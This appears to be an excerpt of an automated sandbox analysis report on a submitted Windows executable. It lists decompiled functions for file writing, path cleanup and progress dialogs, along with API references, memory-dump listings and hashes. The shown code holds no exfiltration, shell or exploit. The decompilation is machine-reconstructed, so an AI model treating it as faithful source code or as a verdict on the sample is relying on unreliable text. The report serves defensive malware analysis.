                                                  0x00405de1
                                                  0x00405de1
                                                  0x00000000
                                                  0x00405de1
                                                  0x00405ddf
                                                  0x00405f44
                                                  0x00405f4e
                                                  0x00405f5a
                                                  0x00405f5a
                                                  0x00000000

                                                  APIs
                                                  • GetVersion.KERNEL32(?,0041FD58,00000000,0040501F,0041FD58,00000000), ref: 00405DC5
                                                  • GetSystemDirectoryA.KERNEL32 ref: 00405E40
                                                  • GetWindowsDirectoryA.KERNEL32(00422F20,00000400), ref: 00405E53
                                                  • SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00405E8F
                                                  • SHGetPathFromIDListA.SHELL32(00000000,00422F20), ref: 00405E9D
                                                  • CoTaskMemFree.OLE32(00000000), ref: 00405EA8
                                                  • lstrcatA.KERNEL32(00422F20,\Microsoft\Internet Explorer\Quick Launch), ref: 00405ECA
                                                  • lstrlenA.KERNEL32(00422F20,?,0041FD58,00000000,0040501F,0041FD58,00000000), ref: 00405F1C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                  • String ID: /B$ /B$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                  • API String ID: 900638850-1912783298
                                                  • Opcode ID: ee09a9c52303261f868f349784a0779ca10ef7a21b96b539f3853377137e7d47
                                                  • Instruction ID: bc679195f81621fcb390d0e71ed0d7b45f11abfd0e51c03931a277fa57cc5d3e
                                                  • Opcode Fuzzy Hash: ee09a9c52303261f868f349784a0779ca10ef7a21b96b539f3853377137e7d47
                                                  • Instruction Fuzzy Hash: A051F471A04A02ABEB256F24DC847BB3B74DB55315F50823BE991B62D0D33C4A42DF8E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00405F5D Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00405F5D(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E0040585B(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E00405819("*?|<>/\":", _t5))) == 0) {
							E00405993(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                  0x00405f5f
                                                  0x00405f67
                                                  0x00405f7b
                                                  0x00405f7b
                                                  0x00405f81
                                                  0x00405f8e
                                                  0x00405f8e
                                                  0x00405f8f
                                                  0x00405f91
                                                  0x00405f95
                                                  0x00405f97
                                                  0x00405fa0
                                                  0x00405fa2
                                                  0x00405fbc
                                                  0x00405fc4
                                                  0x00405fc4
                                                  0x00405fc9
                                                  0x00405fcb
                                                  0x00405fcd
                                                  0x00405fd1
                                                  0x00405fd2
                                                  0x00405fd5
                                                  0x00405fdd
                                                  0x00405fdf
                                                  0x00405fe3
                                                  0x00000000
                                                  0x00000000
                                                  0x00405fe9
                                                  0x00405fee
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00405fee
                                                  0x00405ff3

                                                  APIs
                                                  • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Lc8xQv8iZY.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322A,C:\Users\user\AppData\Local\Temp\,00000000,004033DB), ref: 00405FB5
                                                  • CharNextA.USER32(?,?,?,00000000), ref: 00405FC2
                                                  • CharNextA.USER32(?,"C:\Users\user\Desktop\Lc8xQv8iZY.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322A,C:\Users\user\AppData\Local\Temp\,00000000,004033DB), ref: 00405FC7
                                                  • CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322A,C:\Users\user\AppData\Local\Temp\,00000000,004033DB), ref: 00405FD7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: Char$Next$Prev
                                                  • String ID: "C:\Users\user\Desktop\Lc8xQv8iZY.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 589700163-3208037814
                                                  • Opcode ID: d92e83827d112835d619967b6ac8f9983d34a3d52fae7c27db10b6e3fc01a34b
                                                  • Instruction ID: afd4a01125e034af7a3871a1a8bdb924777211b2e54028c3170dd0334d944cbd
                                                  • Opcode Fuzzy Hash: d92e83827d112835d619967b6ac8f9983d34a3d52fae7c27db10b6e3fc01a34b
                                                  • Instruction Fuzzy Hash: 7111B251808B962DEB3216384C44B777F9DCB967A0F5844BBE9C5722C2C67C9C438B6D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040401E Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E0040401E(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}








                                                  0x00404030
                                                  0x004040c4
                                                  0x00000000
                                                  0x004040c4
                                                  0x00404041
                                                  0x00404045
                                                  0x00000000
                                                  0x00000000
                                                  0x0040404b
                                                  0x00404054
                                                  0x00404057
                                                  0x00404057
                                                  0x0040405d
                                                  0x00404063
                                                  0x00404063
                                                  0x0040406f
                                                  0x00404075
                                                  0x0040407c
                                                  0x0040407f
                                                  0x00404082
                                                  0x00404084
                                                  0x00404084
                                                  0x0040408c
                                                  0x00404092
                                                  0x00404092
                                                  0x0040409c
                                                  0x004040a1
                                                  0x004040a4
                                                  0x004040a9
                                                  0x004040ac
                                                  0x004040ac
                                                  0x004040bc
                                                  0x004040bc
                                                  0x00000000

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                  • String ID:
                                                  • API String ID: 2320649405-0
                                                  • Opcode ID: 244050047767258f024cc5d970fbc24e44c9485df9f09a7a1d92820c249c5868
                                                  • Instruction ID: 6c3acea846b2bea6830d2fc4e13120c874811c96ebe523463579326edd4eeab8
                                                  • Opcode Fuzzy Hash: 244050047767258f024cc5d970fbc24e44c9485df9f09a7a1d92820c249c5868
                                                  • Instruction Fuzzy Hash: AC2184B1904704ABC7319F78DD08B4B7BF8AF41714F048629EA95F22E0C734E904CB65
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00402692 Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 93%
                                                  			E00402692(struct _OVERLAPPED* __ebx) {
				void* _t27;
				long _t32;
				struct _OVERLAPPED* _t47;
				void* _t51;
				void* _t53;
				void* _t56;
				void* _t57;
				void* _t58;

				_t47 = __ebx;
				 *((intOrPtr*)(_t58 - 0xc)) = 0xfffffd66;
				_t52 = E00402A0C(0xfffffff0);
				 *(_t58 - 0x38) = _t24;
				if(E0040585B(_t52) == 0) {
					E00402A0C(0xffffffed);
				}
				E004059B3(_t52);
				_t27 = E004059D2(_t52, 0x40000000, 2);
				 *(_t58 + 8) = _t27;
				if(_t27 != 0xffffffff) {
					_t32 =  *0x423f94;
					 *(_t58 - 0x30) = _t32;
					_t51 = GlobalAlloc(0x40, _t32);
					if(_t51 != _t47) {
						E00403207(_t47);
						E004031D5(_t51,  *(_t58 - 0x30));
						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x20));
						 *(_t58 - 0x34) = _t56;
						if(_t56 != _t47) {
							E00402F2E(_t49,  *((intOrPtr*)(_t58 - 0x24)), _t47, _t56,  *(_t58 - 0x20));
							while( *_t56 != _t47) {
								_t49 =  *_t56;
								_t57 = _t56 + 8;
								 *(_t58 - 0x48) =  *_t56;
								E00405993( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
								_t56 = _t57 +  *(_t58 - 0x48);
							}
							GlobalFree( *(_t58 - 0x34));
						}
						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x30), _t58 - 0x3c, _t47);
						GlobalFree(_t51);
						 *((intOrPtr*)(_t58 - 0xc)) = E00402F2E(_t49, 0xffffffff,  *(_t58 + 8), _t47, _t47);
					}
					CloseHandle( *(_t58 + 8));
				}
				_t53 = 0xfffffff3;
				if( *((intOrPtr*)(_t58 - 0xc)) < _t47) {
					_t53 = 0xffffffef;
					DeleteFileA( *(_t58 - 0x38));
					 *((intOrPtr*)(_t58 - 4)) = 1;
				}
				_push(_t53);
				E00401423();
				 *0x424008 =  *0x424008 +  *((intOrPtr*)(_t58 - 4));
				return 0;
			}











                                                  0x00402692
                                                  0x00402694
                                                  0x004026a0
                                                  0x004026a3
                                                  0x004026ad
                                                  0x004026b1
                                                  0x004026b1
                                                  0x004026b7
                                                  0x004026c4
                                                  0x004026cc
                                                  0x004026cf
                                                  0x004026d5
                                                  0x004026e3
                                                  0x004026e8
                                                  0x004026ec
                                                  0x004026ef
                                                  0x004026f8
                                                  0x00402704
                                                  0x00402708
                                                  0x0040270b
                                                  0x00402715
                                                  0x00402734
                                                  0x0040271c
                                                  0x00402721
                                                  0x00402729
                                                  0x0040272c
                                                  0x00402731
                                                  0x00402731
                                                  0x0040273b
                                                  0x0040273b
                                                  0x0040274d
                                                  0x00402754
                                                  0x00402766
                                                  0x00402766
                                                  0x0040276c
                                                  0x0040276c
                                                  0x00402777
                                                  0x00402778
                                                  0x0040277c
                                                  0x00402780
                                                  0x00402786
                                                  0x00402786
                                                  0x0040278d
                                                  0x0040217a
                                                  0x004028a4
                                                  0x004028b0

                                                  APIs
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004026E6
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 00402702
                                                  • GlobalFree.KERNEL32 ref: 0040273B
                                                  • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,000000F0), ref: 0040274D
                                                  • GlobalFree.KERNEL32 ref: 00402754
                                                  • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 0040276C
                                                  • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402780
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                  • String ID:
                                                  • API String ID: 3294113728-0
                                                  • Opcode ID: 356a7779e7c14d45c55e2df14a00230252c27fbfde8db2330afdf1972136612e
                                                  • Instruction ID: 9ca97f70dd32fe41b4909f681106d09eb720980563b4c140891508526f153775
                                                  • Opcode Fuzzy Hash: 356a7779e7c14d45c55e2df14a00230252c27fbfde8db2330afdf1972136612e
                                                  • Instruction Fuzzy Hash: 2331AD71C00028BBDF216FA5DE88DAE7E79EF05364F10023AF920762E1C77919409F99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00404FE7 Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00404FE7(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x423764;
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x424034;
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E00405D1D(0, _t39, 0x41fd58, 0x41fd58, _a4);
					}
					_t26 = lstrlenA(0x41fd58);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x423748, 0x41fd58);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x41fd58;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x41fd58)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x41fd58, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















                                                  0x00404fed
                                                  0x00404ff9
                                                  0x00404ffc
                                                  0x00405002
                                                  0x0040500e
                                                  0x00405011
                                                  0x00405014
                                                  0x0040501a
                                                  0x0040501a
                                                  0x00405020
                                                  0x00405028
                                                  0x0040502b
                                                  0x00405048
                                                  0x0040504c
                                                  0x00405055
                                                  0x00405055
                                                  0x0040505f
                                                  0x00405068
                                                  0x00405074
                                                  0x0040507b
                                                  0x0040507f
                                                  0x00405082
                                                  0x00405095
                                                  0x004050a3
                                                  0x004050a3
                                                  0x004050a7
                                                  0x004050a9
                                                  0x004050ac
                                                  0x00000000
                                                  0x004050ac
                                                  0x0040502d
                                                  0x00405035
                                                  0x0040503d
                                                  0x00405043
                                                  0x00000000
                                                  0x00405043
                                                  0x0040503d
                                                  0x0040502b
                                                  0x004050b6

                                                  APIs
                                                  • lstrlenA.KERNEL32(0041FD58,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C60,00000000,?), ref: 00405020
                                                  • lstrlenA.KERNEL32(00402C60,0041FD58,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C60,00000000), ref: 00405030
                                                  • lstrcatA.KERNEL32(0041FD58,00402C60,00402C60,0041FD58,00000000,00000000,00000000), ref: 00405043
                                                  • SetWindowTextA.USER32(0041FD58,0041FD58), ref: 00405055
                                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040507B
                                                  • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405095
                                                  • SendMessageA.USER32(?,00001013,?,00000000), ref: 004050A3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                  • String ID:
                                                  • API String ID: 2531174081-0
                                                  • Opcode ID: 7d4126fadd151bd5520c35e17450624f2543502942b5ae19bdadc12a71b725fd
                                                  • Instruction ID: e3991c5cb709e07264e8487875a2ca594626b649f9c95e4975d9101e96294db0
                                                  • Opcode Fuzzy Hash: 7d4126fadd151bd5520c35e17450624f2543502942b5ae19bdadc12a71b725fd
                                                  • Instruction Fuzzy Hash: 0A21AC71900508BBDF11AFA4CC849DFBFB9EF44354F10803AF504B62A0C2398E808FA8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00402BE9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00402BE9(intOrPtr _a4) {
				char _v68;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t15;

				if(_a4 != 0) {
					_t15 =  *0x41712c; // 0x0
					if(_t15 != 0) {
						_t15 = DestroyWindow(_t15);
					}
					 *0x41712c = 0;
					return _t15;
				}
				__eflags =  *0x41712c; // 0x0
				if(__eflags != 0) {
					return E004060C3(0);
				}
				_t6 = GetTickCount();
				__eflags = _t6 -  *0x423f8c;
				if(_t6 >  *0x423f8c) {
					__eflags =  *0x423f88;
					if( *0x423f88 == 0) {
						_t7 = CreateDialogParamA( *0x423f80, 0x6f, 0, E00402B51, 0);
						 *0x41712c = _t7;
						return ShowWindow(_t7, 5);
					}
					__eflags =  *0x424034 & 0x00000001;
					if(( *0x424034 & 0x00000001) != 0) {
						wsprintfA( &_v68, "... %d%%", E00402BCD());
						return E00404FE7(0,  &_v68);
					}
				}
				return _t6;
			}







                                                  0x00402bf5
                                                  0x00402bf7
                                                  0x00402bfe
                                                  0x00402c01
                                                  0x00402c01
                                                  0x00402c07
                                                  0x00000000
                                                  0x00402c07
                                                  0x00402c0f
                                                  0x00402c15
                                                  0x00000000
                                                  0x00402c18
                                                  0x00402c1f
                                                  0x00402c25
                                                  0x00402c2b
                                                  0x00402c2d
                                                  0x00402c33
                                                  0x00402c71
                                                  0x00402c7a
                                                  0x00000000
                                                  0x00402c7f
                                                  0x00402c35
                                                  0x00402c3c
                                                  0x00402c4d
                                                  0x00000000
                                                  0x00402c5b
                                                  0x00402c3c
                                                  0x00402c87

                                                  APIs
                                                  • DestroyWindow.USER32(00000000,00000000), ref: 00402C01
                                                  • GetTickCount.KERNEL32 ref: 00402C1F
                                                  • wsprintfA.USER32 ref: 00402C4D
                                                    • Part of subcall function 00404FE7: lstrlenA.KERNEL32(0041FD58,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C60,00000000,?), ref: 00405020
                                                    • Part of subcall function 00404FE7: lstrlenA.KERNEL32(00402C60,0041FD58,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C60,00000000), ref: 00405030
                                                    • Part of subcall function 00404FE7: lstrcatA.KERNEL32(0041FD58,00402C60,00402C60,0041FD58,00000000,00000000,00000000), ref: 00405043
                                                    • Part of subcall function 00404FE7: SetWindowTextA.USER32(0041FD58,0041FD58), ref: 00405055
                                                    • Part of subcall function 00404FE7: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040507B
                                                    • Part of subcall function 00404FE7: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405095
                                                    • Part of subcall function 00404FE7: SendMessageA.USER32(?,00001013,?,00000000), ref: 004050A3
                                                  • CreateDialogParamA.USER32(0000006F,00000000,00402B51,00000000), ref: 00402C71
                                                  • ShowWindow.USER32(00000000,00000005), ref: 00402C7F
                                                    • Part of subcall function 00402BCD: MulDiv.KERNEL32(000199ED,00000064,?), ref: 00402BE2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                  • String ID: ... %d%%
                                                  • API String ID: 722711167-2449383134
                                                  • Opcode ID: 18699f4e0f9d7d121d06d99e67b46d59f381e8d2f351c96e34ef888321a20e63
                                                  • Instruction ID: c64e3f0d3b0757b6abccf377c05ef7dd5a4a2d15633f5d7fd60a106f882d1610
                                                  • Opcode Fuzzy Hash: 18699f4e0f9d7d121d06d99e67b46d59f381e8d2f351c96e34ef888321a20e63
                                                  • Instruction Fuzzy Hash: F701CC30909215A7E7216FA0AF4DE9E7778A709701750803BFA01B11D0D2F855458BAE
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004048B6 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E004048B6(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                  0x004048c4
                                                  0x004048d1
                                                  0x004048d7
                                                  0x00404915
                                                  0x00404915
                                                  0x00404924
                                                  0x0040492b
                                                  0x00000000
                                                  0x0040492d
                                                  0x004048d9
                                                  0x004048e8
                                                  0x004048f0
                                                  0x004048f3
                                                  0x00404905
                                                  0x0040490b
                                                  0x00404912
                                                  0x00000000
                                                  0x00404912
                                                  0x00000000

                                                  APIs
                                                  • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004048D1
                                                  • GetMessagePos.USER32 ref: 004048D9
                                                  • ScreenToClient.USER32 ref: 004048F3
                                                  • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404905
                                                  • SendMessageA.USER32(?,0000110C,00000000,?), ref: 0040492B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: Message$Send$ClientScreen
                                                  • String ID: f
                                                  • API String ID: 41195575-1993550816
                                                  • Opcode ID: b999d07b324019c2219c33d3107ce818a81de0efbbfc0766a2ac4245d0efef5f
                                                  • Instruction ID: 15d2046a7114e84a1294b603ac72faee52eeac06783d2b716c70649c054a36c5
                                                  • Opcode Fuzzy Hash: b999d07b324019c2219c33d3107ce818a81de0efbbfc0766a2ac4245d0efef5f
                                                  • Instruction Fuzzy Hash: B0014071D00219BADB00DBA4DC45BFFBBBCAB99711F10412ABB10B62D0D7B465018BA5
                                                  Uniqueness

